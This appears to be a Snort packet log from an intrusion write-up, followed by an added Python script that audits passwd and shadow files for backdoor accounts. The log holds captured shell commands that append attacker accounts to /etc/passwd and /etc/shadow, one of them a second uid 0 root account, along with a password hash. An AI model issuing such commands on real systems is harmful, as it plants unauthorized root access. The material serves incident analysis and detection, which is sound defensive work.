73 61 76 69 6E 67 73 03 6E 65 74 00 00 01 00 01  savings.net.....

04/26-06:44:00.432457 63.226.81.13:1351 -> 172.16.1.107:53
TCP TTL:50 TOS:0x0 ID:26498 DF
*****PA* Seq: 0x45D2CB Ack: 0x3FA0791C Win: 0x7D78
TCP Options => NOP NOP TS: 4043120 144023623
65 63 68 6F 20 22 74 77 69 6E 3A 3A 35 30 36 3A  echo "twin::506:
35 30 36 3A 3A 2F 68 6F 6D 65 2F 74 77 69 6E 3A  506::/home/twin:
2F 62 69 6E 2F 62 61 73 68 22 20 3E 3E 20 2F 65  /bin/bash" >> /e
74 63 2F 70 61 73 73 77 64 0A                    tc/passwd.

04/26-06:44:00.448249 172.16.1.107:53 -> 63.226.81.13:1351
TCP TTL:64 TOS:0x0 ID:18892 DF
******A* Seq: 0x3FA0791C Ack: 0x45D305 Win: 0x7C70
TCP Options => NOP NOP TS: 144029033 4043120

04/26-06:44:00.562329 63.226.81.13:1351 -> 172.16.1.107:53
TCP TTL:50 TOS:0x0 ID:26499 DF
*****PA* Seq: 0x45D305 Ack: 0x3FA0791C Win: 0x7D78
TCP Options => NOP NOP TS: 4043134 144029033
65 63 68 6F 20 22 74 77 69 6E 3A 77 33 6E 54 32  echo "twin:w3nT2
48 30 62 36 41 6A 4D 32 3A 3A 3A 3A 3A 3A 3A 22  H0b6AjM2:::::::"
20 3E 3E 20 2F 65 74 63 2F 73 68 61 64 6F 77 0A   >> /etc/shadow.
0A                                               .

04/26-06:44:00.578252 172.16.1.107:53 -> 63.226.81.13:1351
TCP TTL:64 TOS:0x0 ID:18893 DF
******A* Seq: 0x3FA0791C Ack: 0x45D336 Win: 0x7C70
TCP Options => NOP NOP TS: 144029046 4043134

04/26-06:44:03.647436 63.226.81.13:1351 -> 172.16.1.107:53
TCP TTL:50 TOS:0x0 ID:26501 DF
*****PA* Seq: 0x45D336 Ack: 0x3FA0791C Win: 0x7D78
TCP Options => NOP NOP TS: 4043443 144029046
0A                                               .

04/26-06:44:03.658554 172.16.1.107:53 -> 63.226.81.13:1351
TCP TTL:64 TOS:0x0 ID:18894 DF
******A* Seq: 0x3FA0791C Ack: 0x45D337 Win: 0x7C70
TCP Options => NOP NOP TS: 144029354 4043443

04/26-06:44:04.699420 63.226.81.13:1351 -> 172.16.1.107:53
TCP TTL:50 TOS:0x0 ID:26502 DF
*****PA* Seq: 0x45D337 Ack: 0x3FA0791C Win: 0x7D78
TCP Options => NOP NOP TS: 4043548 144029354
65 63 68 6F 20 22 68 61 6E 74 75 3A 3A 30 3A 30  echo "hantu::0:0
3A 3A 2F 3A 2F 62 69 6E 2F 62 61 73 68 22 20 3E  ::/:/bin/bash" >
3E 20 2F 65 74 63 2F 70 61 73 73 77 64 0A        > /etc/passwd.

04/26-06:44:04.718625 172.16.1.107:53 -> 63.226.81.13:1351
TCP TTL:64 TOS:0x0 ID:18895 DF
******A* Seq: 0x3FA0791C Ack: 0x45D365 Win: 0x7C70
TCP Options => NOP NOP TS: 144029460 4043548

04/26-06:44:04.829064 63.226.81.13:1351 -> 172.16.1.107:53
TCP TTL:50 TOS:0x0 ID:26504 DF
*****PA* Seq: 0x45D365 Ack: 0x3FA0791C Win: 0x7D78
TCP Options => NOP NOP TS: 4043561 144029460
65 63 68 6F 20 22 68 61 6E 74 75 3A 77 33 6E 54  echo "hantu:w3nT
32 48 30 62 36 41 6A 4D 32 3A 3A 3A 3A 3A 3A 3A  2H0b6AjM2:::::::
22 20 3E 3E 20 2F 65 74 63 2F 73 68 61 64 6F 77  " >> /etc/shadow
0A 0A 0A                                         ...

04/26-06:44:04.848620 172.16.1.107:53 -> 63.226.81.13:1351
TCP TTL:64 TOS:0x0 ID:18896 DF
******A* Seq: 0x3FA0791C Ack: 0x45D398 Win: 0x7C70
TCP Options => NOP NOP TS: 144029473 4043561

04/26-06:46:21.055744 63.226.81.13:1351 -> 172.16.1.107:53
TCP TTL:50 TOS:0x0 ID:26540 DF
***F**A* Seq: 0x45D398 Ack: 0x3FA0791C Win: 0x7D78
TCP Options => NOP NOP TS: 4057184 144029473

04/26-06:46:21.055951 172.16.1.107:53 -> 63.226.81.13:1351
TCP TTL:64 TOS:0x0 ID:18974 DF
******A* Seq: 0x3FA0791C Ack: 0x45D399 Win: 0x7C70
TCP Options => NOP NOP TS: 144043092 4057184

04/26-06:46:21.056696 172.16.1.107:53 -> 63.226.81.13:1351
TCP TTL:64 TOS:0x0 ID:18975 DF
***F**A* Seq: 0x3FA0791C Ack: 0x45D399 Win: 0x7C70
TCP Options => NOP NOP TS: 144043092 4057184

04/26-06:46:21.167231 63.226.81.13:1351 -> 172.16.1.107:53
TCP TTL:50 TOS:0x0 ID:26542 DF
******A* Seq: 0x45D399 Ack: 0x3FA0791D Win: 0x7D78
TCP Options => NOP NOP TS: 4057196 144043092

Exiting...
===============================================================================
Snort processed 59 packets.
Breakdown by protocol:
    TCP: 33       (55.932%)
    UDP: 26       (44.068%)
   ICMP: 0        (0.000%)
    ARP: 0        (0.000%)
   IPv6: 0        (0.000%)
    IPX: 0        (0.000%)
  OTHER: 0        (0.000%)
===============================================================================
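An audit of passwd and shadow lines for the kind of accounts the intruder appended above, added here as an example and not part of the original write-up. The two intruder entries in the sample are copied from the capture; the root and bin lines and the root hash are constructed placeholders.

```python
"""Audit of passwd/shadow lines for the kind of accounts appended above (added
example, not part of the original write-up). The intruder's two entries are
copied from the capture; the other sample lines are constructed placeholders."""

def parse_passwd(text):
    """Return one dict per passwd line; uid is None when the field is not numeric."""
    rows = []
    for line in text.splitlines():
        if not line.strip() or line.startswith('#'):
            continue
        f = line.split(':')
        if len(f) != 7:
            rows.append({'name': line, 'malformed': True})
            continue
        rows.append({'name': f[0], 'pw': f[1], 'uid': int(f[2]) if f[2].isdigit() else None,
                     'home': f[5], 'shell': f[6], 'malformed': False})
    return rows

def audit_accounts(passwd_text, shadow_text):
    """Return (account, reason) pairs for entries that look like backdoors."""
    shadow = {}
    for line in shadow_text.splitlines():
        if ':' in line:
            name, pw_hash = line.split(':', 2)[:2]
            shadow[name] = pw_hash
    findings, seen = [], set()
    for acct in parse_passwd(passwd_text):
        name = acct['name']
        if acct['malformed']:
            findings.append((name, 'malformed passwd line'))
            continue
        if name in seen:
            findings.append((name, 'duplicate account name'))
        seen.add(name)
        if acct['uid'] == 0 and name != 'root':
            findings.append((name, 'uid 0 account besides root'))
        if acct['pw'] == '':
            findings.append((name, 'empty password field in passwd'))
        elif acct['pw'] == 'x' and name not in shadow:
            findings.append((name, 'shadowed account without a shadow entry'))
    # Scripted backdoors often set the same password on every account they add.
    by_hash = {}
    for name, pw_hash in shadow.items():
        if pw_hash not in ('', '*', '!', '!!'):
            by_hash.setdefault(pw_hash, []).append(name)
    for names in by_hash.values():
        if len(names) > 1:
            findings.append((','.join(names), 'identical password hash'))
    return findings

# Constructed sample: the last two lines of each file are the ones the intruder echoed in.
PASSWD = """root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
twin::506:506::/home/twin:/bin/bash
hantu::0:0::/:/bin/bash
"""
SHADOW = """root:PLACEHOLDER_ROOT_HASH:10000:0:99999:7:::
bin:*:10000:0:99999:7:::
twin:w3nT2H0b6AjM2:::::::
hantu:w3nT2H0b6AjM2:::::::
"""
```

`audit_accounts(PASSWD, SHADOW)` reports hantu as a second uid 0 account, both new accounts with an empty passwd field, and the shared hash between them.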